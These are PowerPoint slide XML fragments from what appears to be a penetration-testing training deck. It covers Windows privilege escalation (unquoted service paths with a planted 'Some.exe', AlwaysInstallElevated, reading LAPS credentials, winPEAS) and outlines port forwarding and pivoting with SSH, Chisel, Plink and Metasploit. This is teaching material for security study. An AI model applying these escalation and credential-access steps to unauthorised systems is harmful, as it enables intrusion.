        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9771619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0A00B-308D-466C-84EB-EE48FD9166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A3E0869-6B53-4C16-9B4C-3E7C08CFEF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special Note: Unquoted Service Paths</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6CB60DD-0CB4-4F6F-A228-5F56A47666B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="1042447"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Affects service paths that have spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Example: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=C:\Program Files\Some Program\service.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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E9C0D6-DDD5-4D3D-92C5-2A0CEBBD7D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754983" y="2359589"/>
            <a:ext cx="102162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System Attempts:</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a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Program.exe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C:\Program Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Some.exe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C:\Program Files\Some Program\</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>service.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EB9AEB4-185E-4769-9F24-2C6B682E2FCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434050" y="4436097"/>
            <a:ext cx="11363325" cy="156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rPr>
              <a:t>Likely can’t write to Program Files, but might have access to “Some Program”</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rPr>
              <a:t>Insert a program called “Some.exe” with what you want to run</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rPr>
              <a:t>Requires ability to start/stop/restart service or computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17428669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190D8-831A-4A88-9D85-1D06230154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62314F4-5663-4E3E-BEC4-E0672B227A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other Things to be Aware of</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C612229C-8C2E-4620-881A-3A4DF9E30591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AlwaysInstallElevated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HKCU[HKLM]\SOFTWARE\Policies\Microsoft\Windows\Installer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LAPS (Domain)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local Administrator Password Solution – Easy creds if you can read</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check group permissions to see if you have access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14650486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EAAED-D2BF-438F-8DCB-F5D3C92EC1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82FDFD6-9BCF-4465-878D-B64DD7FD9EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wrap-Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA253DCA-DC27-4F18-BC97-DAF58CCB7C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="6474734" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Privilege Escalation can be hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires even more knowledge/familiarity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get a checklist &amp; use tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>winPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is often preferred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t forget to look outward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secondary resources can help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Udemy often has Tib3rius and TCM courses discounted for ~$15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FD2BDA8-B737-412C-88BB-1D7794673708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="16701" r="14629"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318780" y="1595120"/>
            <a:ext cx="4459638" cy="3667760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42557929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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30218480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27F1-F08F-4F09-BFE9-C3E9055CB355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="560831" y="1303655"/>
            <a:ext cx="10006615" cy="2009720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Chapter 7:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>Port Forwarding and Pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135131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B8001-CD78-6846-91F1-30431D512F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chapter 1:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reconnaissance </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366328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E2A71-87E3-46D1-AF78-6624C7630D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1BFCE23-1FC2-46A2-9AA6-1AE2CE69F2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32275602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7A166-21AE-474B-BBDF-4EE98C6C49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4F5BD7F-36AB-4DF4-BDCE-ECA7C0ABFE84}"/>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C9261E33-F169-4EAC-AA61-21D90DFBF89D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Uses of port redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SSH Port Forwarding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Chisel &amp; Plink</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21802418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9E85D0-AD62-4727-A44F-E06E99A055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E70BDDB-A019-4D5B-BF0F-39E9BE3A0A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When To Use Redirection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FBAD09-DE1D-4CE4-A817-9EFA6C5383D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426721" y="1371600"/>
            <a:ext cx="5815784" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Testing a network from outside a firewall with tight inbound rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bigger networks with multiple segments (or domains in a forest)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Accessing services that are only listening locally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDEC92DC-17DC-4BE0-BB71-44E8A91AA229}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7754660" y="2234578"/>
            <a:ext cx="4789462" cy="3456008"/>
            <a:chOff x="7673827" y="2181877"/>
            <a:chExt cx="4707504" cy="3339023"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF977F3B-8888-45DA-A45C-D9CCC9D53D75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9304005" y="2966217"/>
              <a:ext cx="2479312" cy="573417"/>
              <a:chOff x="4349013" y="3744323"/>
              <a:chExt cx="2556315" cy="919187"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:scene3d>
              <a:camera prst="isometricRightUp"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="46" name="Graphic 45" descr="Binary with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABAA4334-C2DF-4A62-A6FC-6A254E4790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9013" y="3744323"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Graphic 46" descr="Binary with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCB983BF-5CA3-428A-B21F-1F117BB7E6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7117" y="3744323"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="48" name="Graphic 47" descr="Binary with solid fill">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1780E7-75A8-47AD-912E-F2BD3F5854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0928" y="3749110"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:sp3d/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="Group 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4142574-72AC-40C0-AB57-FD56CEAAE3FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8063622" y="2181877"/>
              <a:ext cx="4317709" cy="3339023"/>
              <a:chOff x="8063622" y="2181877"/>
              <a:chExt cx="4317709" cy="3339023"/>
            </a:xfrm>
            <a:scene3d>
              <a:camera prst="isometricLeftDown"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="31" name="Group 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C83E7B7-3887-4BD5-9478-B6FA035F1EC6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8063622" y="2181877"/>
                <a:ext cx="3434708" cy="2702067"/>
                <a:chOff x="8063622" y="2181877"/>
                <a:chExt cx="3434708" cy="2702067"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="33" name="Cube 32">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B6EA9D1-0B9B-4EE9-B707-7758EB02BE09}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8083633" y="2185143"/>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4" name="Cube 33">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76CECF19-FEB1-41E8-9ABE-A81B38092CCA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9172596" y="2181877"/>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5" name="Cube 34">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6391A01B-F410-4D0D-BE17-6134E97B4DD6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10261559" y="2185143"/>
                  <a:ext cx="941153" cy="564657"/>
                </a:xfrm>
                <a:prstGeom prst="cube">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:ln>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6" name="Cube 35">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E035BA6-A670-4C80-99B2-A532C657FE92}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8379252" y="2898934"/>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7" name="Cube 36">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC337E1C-1D90-4A8B-9F95-8265C07FA694}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9468215" y="2895668"/>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8" name="Cube 37">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173FAC07-B3B4-4A7F-BE23-B93A6E4D44A8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10557177" y="2898934"/>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39" name="Cube 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{645F1199-9D8E-4910-8A78-128FF2DAB456}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8063622" y="3605496"/>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0" name="Cube 39">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CC2AEF3-66C3-443F-B933-25BBEBF5AB4A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9152585" y="3602230"/>
                  <a:ext cx="320040" cy="564657"/>
                </a:xfrm>
                <a:prstGeom prst="cub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1" name="Cube 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B953531-683A-4CAF-B76D-BD3A4C1E530F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10241547" y="3605496"/>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2" name="Cube 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
